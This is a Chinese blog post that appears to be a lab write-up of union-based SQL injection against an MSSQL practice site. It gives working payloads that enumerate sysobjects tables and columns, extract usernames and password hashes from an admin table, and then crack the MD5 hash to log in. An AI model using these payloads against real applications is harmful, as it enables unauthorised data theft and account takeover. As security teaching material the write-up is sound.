<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="mssql注入">
<meta property="og:type" content="article">
<meta property="og:title" content="mssql注入">
<meta property="og:url" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="xf&#39;s blog">
<meta property="og:description" content="mssql注入">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210919212858482.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210919212858482.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920074853357.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920074922534.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920075000480.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920075417417.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920075917833.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920075940707.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920081127473.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920081312254.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920081729165.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920082419751.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920082503067.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920082748552.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920083917882.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920084507094.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920085009429.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920085901412.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920085942225.png">
<meta property="og:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920090106420.png">
<meta property="article:published_time" content="2021-09-20T08:19:36.000Z">
<meta property="article:modified_time" content="2021-09-20T08:22:42.962Z">
<meta property="article:author" content="xf">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210919212858482.png">


<link rel="canonical" href="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/","path":"2021/09/20/web安全/SQL注入篇/mssql注入/","title":"mssql注入"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>mssql注入 | xf's blog</title>
  

  <script src="/js/third-party/analytics/baidu-analytics.js"></script>
  <script async src="https://hm.baidu.com/hm.js?50383950ce261bfae047ef555de05e48"></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">xf's blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1%EF%BC%89%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">1）前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-mssql%E7%9A%84%E7%B3%BB%E7%BB%9F%E8%A1%A8"><span class="nav-number">1.1.</span> <span class="nav-text">1.mssql的系统表</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E5%B8%B8%E7%94%A8%E7%9A%84%E5%86%85%E7%BD%AE%E5%87%BD%E6%95%B0"><span class="nav-number">1.2.</span> <span class="nav-text">2.常用的内置函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E5%B8%B8%E7%94%A8%E5%85%A8%E5%B1%80%E5%B8%B8%E9%87%8F"><span class="nav-number">1.3.</span> <span class="nav-text">3.常用全局常量</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2%EF%BC%89%E6%9F%A5%E6%89%BE%E5%88%87%E5%85%A5%E7%82%B9"><span class="nav-number">2.</span> <span class="nav-text">2）查找切入点</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3%EF%BC%89%E5%BC%80%E5%A7%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">3.</span> <span class="nav-text">3）开始注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E8%8E%B7%E5%8F%96%E5%AD%97%E6%AE%B5%E4%B8%AA%E6%95%B0"><span class="nav-number">3.1.</span> <span class="nav-text">1.获取字段个数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E6%B5%8B%E8%AF%95%E6%98%AF%E5%90%A6%E6%9C%89%E5%9B%9E%E6%98%BE%E4%BD%8D"><span class="nav-number">3.2.</span> <span class="nav-text">2.测试是否有回显位</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E8%8E%B7%E5%8F%96%E5%9B%9E%E6%98%BE%E4%BD%8D"><span class="nav-number">3.3.</span> <span class="nav-text">3.获取回显位</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4%EF%BC%89%E8%8E%B7%E5%8F%96%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF"><span class="nav-number">4.</span> <span class="nav-text">4）获取基本信息</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5%EF%BC%89%E8%8E%B7%E5%8F%96%E8%A1%A8%E5%90%8D"><span class="nav-number">5.</span> <span class="nav-text">5）获取表名</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6%EF%BC%89%E8%8E%B7%E5%8F%96%E5%88%97%E5%90%8D"><span class="nav-number">6.</span> <span class="nav-text">6）获取列名</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#7%EF%BC%89%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE"><span class="nav-number">7.</span> <span class="nav-text">7）获取数据</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="xf"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">xf</p>
  <div class="site-description" itemprop="description">xf@github.io</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="xf">
      <meta itemprop="description" content="xf@github.io">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xf's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          mssql注入
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2021-09-20 16:19:36 / 修改时间：16:22:42" itemprop="dateCreated datePublished" datetime="2021-09-20T16:19:36+08:00">2021-09-20</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>mssql注入</p>
<span id="more"></span>

<h1 id="1）前置知识"><a href="#1）前置知识" class="headerlink" title="1）前置知识"></a>1）前置知识</h1><h2 id="1-mssql的系统表"><a href="#1-mssql的系统表" class="headerlink" title="1.mssql的系统表"></a>1.mssql的系统表</h2><p>在<code>mssql</code>中，每一个数据库中都有一个系统表，那就是<code>sysobjects</code>。如果需要指定库访问，那么就是<code>库名.dbo.sysobjects</code>，这个<code>dbo</code>是<code>mssql</code>的特性，每一个表都会加上这个前缀。它的位置在每个数据库中<code>视图-&gt;系统视图</code>中。</p>
<p><code>sysobjects</code>能获取的<strong>重要信息</strong>：</p>
<ul>
<li><code>name</code>：表名(对象名)</li>
<li><code>id</code>：对象的编号</li>
<li><code>xtype</code>：对象的类型<ul>
<li><code>S</code>：系统表</li>
<li><code>U</code>：用户表</li>
<li><code>V</code>：视图</li>
<li>…</li>
<li><img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210919212858482.png" class=""></li>
</ul>
</li>
<li>…</li>
</ul>
<h2 id="2-常用的内置函数"><a href="#2-常用的内置函数" class="headerlink" title="2.常用的内置函数"></a>2.常用的内置函数</h2><ul>
<li><code>db_name(int:id)</code><ul>
<li>获取指定数据库编号的名字</li>
<li>0：代指当前数据库编号（一个保留编号，非当前数据库真正编号）</li>
<li>不写参数默认就是0</li>
<li>获取不到即为<code>null</code></li>
</ul>
</li>
<li><code>db_id(str:name)</code><ul>
<li>获取指定数据库的编号</li>
<li>默认就是获取当前数据库的编号</li>
<li>获取不到即为<code>null</code></li>
</ul>
</li>
<li><code>object_id(str:object_name,str:object_type) </code><ul>
<li>每个对象都有一个唯一的id，这个函数就是返回该对象的id</li>
<li>参数：<ul>
<li>第一个：对象名称</li>
<li>第二个：对象的类型<ul>
<li><img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210919212858482.png" class=""></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><code>col_name(int:table_id,int:column_id)</code><ul>
<li>参数：<ul>
<li>第一个：表的编号</li>
<li>第二个：第几列</li>
</ul>
</li>
<li>根据表编号以及第几列获取对应的列名</li>
<li>下标超过了字段数则返回null</li>
</ul>
</li>
</ul>
<h2 id="3-常用全局常量"><a href="#3-常用全局常量" class="headerlink" title="3.常用全局常量"></a>3.常用全局常量</h2><ul>
<li><code>@@version</code><ul>
<li>获取当前<code>mssql</code>的版本号</li>
</ul>
</li>
<li><code>system_user</code><ul>
<li>获取当前的系统用户</li>
</ul>
</li>
</ul>
<h1 id="2）查找切入点"><a href="#2）查找切入点" class="headerlink" title="2）查找切入点"></a>2）查找切入点</h1><p>正常访问：</p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920074853357.png" class="">

<p>使用布尔进行测试：<code>and 1=1</code>，正常访问：</p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920074922534.png" class="">

<p>使用<code>and 1=2</code>进行测试，找到切入点，说明这是一个纯数值型的注入。</p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920075000480.png" class="">

<h1 id="3）开始注入"><a href="#3）开始注入" class="headerlink" title="3）开始注入"></a>3）开始注入</h1><h2 id="1-获取字段个数"><a href="#1-获取字段个数" class="headerlink" title="1.获取字段个数"></a>1.获取字段个数</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 通过order by ? 方法获取字段数量</span></span><br></pre></td></tr></table></figure>

<p>获取到<code>order by</code>的阈值为<code>3</code>，那么他的字段数就为<code>2</code></p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920075417417.png" class="">

<h2 id="2-测试是否有回显位"><a href="#2-测试是否有回显位" class="headerlink" title="2.测试是否有回显位"></a>2.测试是否有回显位</h2><p>既然获取到了字段数，那么就可以通过<code>union select</code>进行级联查询获取结果。</p>
<p>因为<code>mssql</code>数据库中，如果级联查询的结果与被级联查询有重复的，那么将会不显示。</p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920075917833.png" class="">

<p>使用<code>union all select</code>将会全部显示。</p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920075940707.png" class="">

<p>并且在<code>union </code>时每一列的类型必须相同，否则报错，使用<code>null</code>是万能类型</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- payload</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">2</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">all</span> <span class="keyword">select</span> <span class="keyword">null</span>,<span class="keyword">null</span></span><br></pre></td></tr></table></figure>

<p>经过尝试发现一直报错，然后就去测试<code>order by 4</code>，发现成功显示了？？？</p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920081127473.png" class="">

<p>百思不得其解，感觉是靶场有问题。最后经过测试发现阈值为<code>5</code>，那么<code>4</code>就是字段数。再进行级联尝试。</p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920081312254.png" class="">

<p>成功了，没有报错！</p>
<h2 id="3-获取回显位"><a href="#3-获取回显位" class="headerlink" title="3.获取回显位"></a>3.获取回显位</h2><p>既然能够成功级联查询，那么就可以开始获取回显位了。</p>
<p>因为<code>mssql</code>级联有着类型要求，所以我们只能慢慢尝试，将每一位尝试转换类型，如：<code>1</code>，<code>&#39;a&#39;</code>等试试。</p>
<p><strong>注意：我们是来查找回显位的，切换类型没报错没回显，那就不是回显位。</strong></p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920081729165.png" class="">

<p>成功获取到回显位以及对应的类型。</p>
<h1 id="4）获取基本信息"><a href="#4）获取基本信息" class="headerlink" title="4）获取基本信息"></a>4）获取基本信息</h1><blockquote>
<p>获取当前的mssql版本</p>
</blockquote>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920082419751.png" class="">

<blockquote>
<p>获取当前的系统用户</p>
</blockquote>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920082503067.png" class="">

<blockquote>
<p>获取当前数据库名</p>
</blockquote>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920082748552.png" class="">

<h1 id="5）获取表名"><a href="#5）获取表名" class="headerlink" title="5）获取表名"></a>5）获取表名</h1><p>因为有着<code>sysobjects</code>表，所以我们可以通过<code>xtype</code>查找到用户创建的表。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--	因为可能有多张表，所以要使用top 1进行约束为一个值</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">2</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">all</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,(</span><br><span class="line"><span class="keyword">select</span> top <span class="number">1</span> name <span class="keyword">from</span> sysobjects <span class="keyword">where</span> xtype<span class="operator">=</span><span class="string">&#x27;u&#x27;</span></span><br><span class="line">),<span class="keyword">null</span></span><br></pre></td></tr></table></figure>

<p><strong>注意：如果无法使用单引号，那么可以将对应字符串转为16进制值，格式：<code>0x??</code></strong></p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920083917882.png" class="">

<p>获取到第一个表：<code>manage</code>，使用排除法获取第二条数据（先查到第一条的数据，然后通过<code>not in</code>排除第一条的数据）。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 方式一	每次查下一个表时，就得在集合中放入上一次的表名</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">2</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">all</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,(</span><br><span class="line"><span class="keyword">select</span> top <span class="number">1</span> name <span class="keyword">from</span> sysobjects <span class="keyword">where</span> xtype<span class="operator">=</span><span class="string">&#x27;u&#x27;</span> <span class="keyword">and</span> name <span class="keyword">not</span> <span class="keyword">in</span>(<span class="string">&#x27;manage&#x27;</span>)</span><br><span class="line">),<span class="keyword">null</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--	方式二 通过修改子语句中的 top 值来实现排除获取</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">2</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">all</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,(</span><br><span class="line"><span class="keyword">select</span> top <span class="number">1</span> name <span class="keyword">from</span> sysobjects <span class="keyword">where</span> xtype<span class="operator">=</span><span class="string">&#x27;u&#x27;</span> <span class="keyword">and</span> name <span class="keyword">not</span> <span class="keyword">in</span>(</span><br><span class="line">    <span class="keyword">select</span> top <span class="number">1</span> name <span class="keyword">from</span> sysobjects <span class="keyword">where</span> xtype<span class="operator">=</span><span class="string">&#x27;u&#x27;</span></span><br><span class="line">)</span><br><span class="line">),<span class="keyword">null</span></span><br></pre></td></tr></table></figure>

<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920084507094.png" class="">

<p>最后获取到所有表名：<code>manage</code>、<code>announcement</code></p>
<p>我们要使用的表那肯定就是<code>manage</code>。</p>
<h1 id="6）获取列名"><a href="#6）获取列名" class="headerlink" title="6）获取列名"></a>6）获取列名</h1><p>获取列名最关键的函数就是<code>col_name</code>，通过表的编号进行获取，获取表的编号的函数为<code>object_id</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- payload</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">2</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">all</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,(</span><br><span class="line"><span class="keyword">select</span> top <span class="number">1</span> col_name(object_id(<span class="string">&#x27;manage&#x27;</span>),<span class="number">1</span>)</span><br><span class="line">),<span class="keyword">null</span></span><br></pre></td></tr></table></figure>

<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920085009429.png" class="">

<p>通过修改<code>col_name</code>函数第二个参数获取其所有的字段名：<code>id</code>，<code>username</code>，<code>password</code></p>
<h1 id="7）获取数据"><a href="#7）获取数据" class="headerlink" title="7）获取数据"></a>7）获取数据</h1><p>既然知道库名、表名、列名了，那么就可以直接获取数据了。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 获取数据payload</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">2</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">all</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,(</span><br><span class="line"><span class="keyword">select</span> top <span class="number">1</span> username <span class="keyword">from</span> manage</span><br><span class="line">),<span class="keyword">null</span></span><br></pre></td></tr></table></figure>

<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920085901412.png" class="">

<p>获取密码同理：</p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920085942225.png" class="">

<p>通过使用<code>md5碰撞解密</code>获取到密码明文，然后登录后台，成功获取到<code>key</code></p>
<img src="/2021/09/20/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mssql%E6%B3%A8%E5%85%A5/image-20210920090106420.png" class="">

    </div>

    
    
    

    <footer class="post-footer">
